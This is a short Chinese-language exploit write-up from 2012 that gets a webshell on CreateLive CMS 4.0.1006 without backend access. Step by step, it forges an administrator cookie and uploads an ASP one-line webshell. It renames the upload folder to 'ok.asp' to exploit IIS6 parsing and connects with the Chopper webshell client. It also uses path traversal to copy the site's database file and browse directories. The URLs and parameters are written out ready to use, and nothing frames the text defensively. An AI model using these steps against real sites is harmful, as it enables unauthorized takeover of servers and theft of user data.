Title:CreateLiveCMSV4.0 漏洞,无需后台Get shell --2012-03-06 17:28
标题:CreateLive CMS Version 4.0.1006 漏洞,无需后台 Get shell
必须环境:IIS6,上传目录可执行脚本
CreateLive CMS Version 4.0.1006 是个非常古老滴CMS了。
-----------------------------------------------------------------------------------------------------------------------------------------------
在弄个非常Old的站的时候发现是CreateLive CMS Version 4.0.1006版本。
纠结地找洞时候发现了一点漏洞。
注册个用户,登录。
修改cookie:UserGroupID=1&Password=798fb0743e519ec0&UserName=admin&UserID=1
保存cookie,打开
http://XXX.XXX.XXX.XXX/dlugis/user/upload.asp?action=F&id=3&type=0
id的值按需求改变.
上传一个copy的ASP一句话
查看文件目录
http://xxx.xxx.xxx.xxx/dlugis/Admin/Admin_Files.asp?action=Main&FileType=select&ChannelID=2&ThisDir=../Photo/2012-3
更改文件夹名
http://XXX.XXX.XXX.XXX/dlugis/Admin/Admin_Files.asp?action=Rname&FileType=select&ChannelID=3&FolderId=2012-3&NewName=ok.asp
查看下成功没有
菜刀连接
http://XXX.XXX.XXX.XXX/dlugis/Admin/Admin_Files.asp?action=Rname&FileType=select&ChannelID=3&FileId=../../Data/%23Cl_Count.mdb&NewName=ok
把别的目录的数据库文件复制到当前目录,文件名为ok.mdb
http://XXX.XXX.XXX.XXX/dlugis/Admin/Admin_Files.asp?action=Main&FileType=select&ChannelID=2&ThisDir=../../../
浏览目录